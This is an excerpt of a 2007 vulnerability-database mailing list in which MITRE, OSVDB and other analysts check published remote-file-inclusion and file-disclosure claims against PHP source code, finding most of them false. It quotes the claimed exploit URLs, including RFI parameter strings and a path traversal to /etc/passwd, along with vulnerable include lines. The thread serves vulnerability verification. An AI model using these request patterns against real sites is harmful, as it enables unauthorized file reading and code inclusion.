Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell # Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell # Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell # Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell (the four vendor mentioned files) -- So, the CVE above isn't necessarily a dupe as it doesn't mention the vulnerable files. If the CVE is expanded/overhauled, i'd guess they will change it to mention the four files as well as the example RFI vuln in the original disclosure, but it seems they could just as easily add it to 2002-2123? From jericho at attrition.org Thu Apr 26 21:08:44 2007 From: jericho at attrition.org (security curmudgeon) Date: Thu, 26 Apr 2007 21:08:44 +0000 (UTC) Subject: [VIM] False: Joomla/Mambo Jambook v1.0 beta7 Rfi Vuln. In-Reply-To: <46242B2E.7040903@tenablesecurity.com> References: <46242B2E.7040903@tenablesecurity.com> Message-ID: : Bugtraq 23509 looks false. It concerns a remote file include flaw in a : third-party component for Mambo / Joomla called Jambook. I installed 1.0 : beta7, which crazy_king claims is affected. Here's the code in : 'components/com_jambook/jambook.php': This is also CVE 2007-2196, and the original disclosure is from bugtraq: http://archives.neohapsis.com/archives/bugtraq/2007-04/0239.html From coley at mitre.org Thu Apr 26 23:24:18 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 26 Apr 2007 19:24:18 -0400 (EDT) Subject: [VIM] true: 2 distinct LMS RFI, one old, one new; and vague ACK Message-ID: <200704262324.l3QNOIdi007861@faron.mitre.org> == RFI 1 == Researcher: InyeXion Ref: BUGTRAQ lms 1.5.3 Remote File Inclusion http://archives.neohapsis.com/archives/bugtraq/2007-04/0379.html This is a 2-year-old version. I grabbed it: http://www.lms.org.pl/download/1.5/lms-1.5.3+libs.tar.gz and the first executable line is as stated: include($_LIB_DIR.'/multipart_mime_email.php'); This line does not appear in later versions: ./lms-1.6.8/modules/rtmessageadd.php ./lms-1.6.9/modules/rtmessageadd.php ./lms-1.8.9/modules/rtmessageadd.php == RFI 2 == Researcher: Kacper Ref: http://www.milw0rm.com/exploits/3545 For version 1.8.9: The first lines in welcome.php are: require_once($_LIB_DIR.'/Sysinfo.class.php'); @include($_LIB_DIR.'/locale/'.$_language.'/fortunes.php'); the only line in userpanel.php is: include($CONFIG['directories']['userpanel_dir']."/lib/LMS.setup.php"); == Vendor ACK of... something. == Vendor changelog is at http://www.lms.org.pl/changelog.php ChangeLog,v 1.1115 2007/04/24 has: version ? (????-??-??): ... fixed some remote file inclusion vulnerabilities when register_globals is enabled (alec) But since the vulnerable 1.8.9 is the latest available version, it's not provable that the vendor is talking about RFI 2, instead of some other issue. - Steve From coley at mitre.org Thu Apr 26 23:51:16 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 26 Apr 2007 19:51:16 -0400 (EDT) Subject: [VIM] researcher "alijsb" Message-ID: <200704262351.l3QNpGDF008493@faron.mitre.org> alijsb has been posting to Bugtraq a lot lately. I've tried investigating a couple claims and run into dead ends - vendor URLs that don't seem related to the product, vendor URLs that don't exist, etc. Has anybody done any closer investigations? - Steve From jericho at attrition.org Fri Apr 27 00:05:05 2007 From: jericho at attrition.org (security curmudgeon) Date: Fri, 27 Apr 2007 00:05:05 +0000 (UTC) Subject: [VIM] Apache AXIS Non-Existent Java Web Service Path Disclosure? Message-ID: Watchfire's Appscan product looks for this vulnerability (not sure what they officially title it, the title above is my own), but I can't find any reference to it. Google finds a lot of indirect references suggesting it is common knowledge to the folks who use the product. Has anyone seen this before or have a reference? ---------- Requesting this URL will generate the error message: http://[target]/axis/tt_pm4l.jws?wsdl AXIS error Sorry, something seems to have gone wrong... here are the details: Fault - java.io.FileNotFoundException: c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory) AxisFault faultCode: {http://xml.apache.org/axis/}Server.userException faultString: java.io.FileNotFoundException: c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory) faultActor: null faultDetail: stackTrace: java.io.FileNotFoundException: c:\inetpub\wwwroot\axis\tt_pm4l.jws (No such file or directory) [SNIP] From str0ke at milw0rm.com Fri Apr 27 05:56:03 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 27 Apr 2007 00:56:03 -0500 Subject: [VIM] researcher "alijsb" In-Reply-To: <200704262351.l3QNpGDF008493@faron.mitre.org> References: <200704262351.l3QNpGDF008493@faron.mitre.org> Message-ID: <814b9d50704262256o3bdb7fc4n108374cd2ea6492a@mail.gmail.com> Nopers. Once I saw the products didn't match up I just stopping going over them :) /str0ke On 4/26/07, Steven M. Christey wrote: > > alijsb has been posting to Bugtraq a lot lately. I've tried > investigating a couple claims and run into dead ends - vendor URLs > that don't seem related to the product, vendor URLs that don't exist, > etc. > > Has anybody done any closer investigations? > > - Steve > From heinbockel at mitre.org Fri Apr 27 14:00:42 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Fri, 27 Apr 2007 10:00:42 -0400 Subject: [VIM] FALSE -> PHP Point of Sale (osCommerce) LFI Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B1E5@IMCSRV5.MITRE.ORG> >From a BUGTRAQ posting last month, PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln http://marc.info/?l=bugtraq&m=117399405001938&w=2 In index.php: > session_start(); > include ("settings.php"); > include ("language/$cfg_language"); >From the download, settings.php exists, but is empty. According to the readme.txt file, the user is suppose to install the application via install/index.php. Here, the user is prompted to select their language, which is passed to install/installer.php. In installer.php: > $language=$_POST['language']; > > $info=" > \$cfg_language=\"$language\"; > > ?>"; > $open = fopen( "../settings.php", "w+" ) or die ( "Operation Failed!" ); > fputs( $open, "$info" ); > fclose( $open ); > > > include("../settings.php"); > include("../language/$cfg_language"); So, this is no issue if the user follows the installation instructions. William Heinbockel Infosec Engineer, Sr. The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From heinbockel at mitre.org Fri Apr 27 14:14:51 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Fri, 27 Apr 2007 10:14:51 -0400 Subject: [VIM] FALSE -> 2bgal RFI Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B1F3@IMCSRV5.MITRE.ORG> Another dispute of Born To K!LL: BUGTRAQ:20070331 2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability http://marc.info/?l=bugtraq&m=117552845904509&w=2 CVE-2007-1852 The lang_filename parameter is defined the line above where it is used in both index.php and backupdb.inc.php. In admin/index.php (line 73-74): > $lang_filename = "lang/".$lang."/index.inc.php"; > require($lang_filename); ***************************************************************** In admin/backupdb.inc.php: line 17-18: > //securite #1 : pas d'appel direct du fichier > if (!defined('STAYONINCLUDE')) {exit;} line 28-29: > $lang_filename = "lang/".$lang."/backupdb.inc.php"; > require($lang_filename); William Heinbockel Infosec Engineer, Sr. The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From heinbockel at mitre.org Fri Apr 27 15:07:52 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Fri, 27 Apr 2007 11:07:52 -0400 Subject: [VIM] What the *#$(! -- b2evolution RFI [False] Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B21D@IMCSRV5.MITRE.ORG> >From s433d: Remote File Inclusion http://www.securityfocus.com/archive/1/archive/1/466886/100/0/threaded What is going on with the recent trends of really weird exploits: b2evolution\blogs/a_noskin.php?require=shell? b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell? b2evolution\blogs/admin.php?inc_path= b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell? b2evolution\blogs/admin.php?inc_path=shell Let's see, Windows backslashes? CHECK File names as parameters? CHECK Empty PoC examples? CHECK Unverified exploits? CHECKITY CHECK CHECK What's the real issue? n00b? really bad scripter? clueless "kiddie"? All of the above? Anyway, on to the Disputes! >From b2evolution 1.9.3 "rainforest" edition: (1) The inc_path variable is defined in conf/_advanced.php, which is included by conf/_config.php, which is included before all later uses of inc_path in all of the following files: blogs/a_noskin.php blogs/a_stub.php blogs/admin.php blogs/contact.php blogs/default.php blogs/index.php blogs/multiblogs.php And he forgot one: blogs/summary.php - which also includes conf/_config.php before $inc_path All of the following are also declared in conf/_advanced.php: (2) $view_path in blogs/admin.php (3) $control_path.$ctrl_mappings[$ctrl] in blogs/admin.php [ctrl_mappings[$ctrl] appears to be checked against a static list] (4) $skins_path in blogs/contact.php and blogs/multiblogs.php I'm not even going to bother with debunking the example exploits... William Heinbockel Infosec Engineer, Sr. The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From gmdarkfig at gmail.com Sun Apr 29 10:00:53 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 29 Apr 2007 12:00:53 +0200 Subject: [VIM] false: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability Message-ID: Title: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability Link: http://www.securityfocus.com/archive/1/467103/30/0/threaded Quote from the thread: "Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd" ./modules/file.php: class file extends module_base [...] function download() [...] $dbr->query("SELECT f.filepath, f.downloads, h.url FROM {$dbr->p}files f LEFT JOIN {$dbr->p}file_hosts h ON h.hostid=f.hostid WHERE fileid=$this->id"); if ($dbr->numrows() < 1) return showmsg('noresults_badurl'); $a = $dbr->getarray(); [...] header("Content-Type: application/save"); header("Content-Disposition: attachment; filename=\"$filename\""); $fh = readfile($a['filepath']); From steve at vitriol.net Mon Apr 30 20:11:49 2007 From: steve at vitriol.net (Steve Tornio) Date: Mon, 30 Apr 2007 15:11:49 -0500 Subject: [VIM] iMovie Format String CVE-2007-0646 Message-ID: <46364D85.9000107@vitriol.net> This CVE references MOAB-30-01-2007, which covered Format String flaws in Help Viewer, Safari, iMovie HD and iPhoto. It also references the Apple Security Update 2007-004, which includes fixes for the Help Viewer and a separate Format String flaw in Installer. Is there any indication that the flaw fixed in Help Viewer is the same as Safari, iMovie and iPhoto? Steve osvdb.org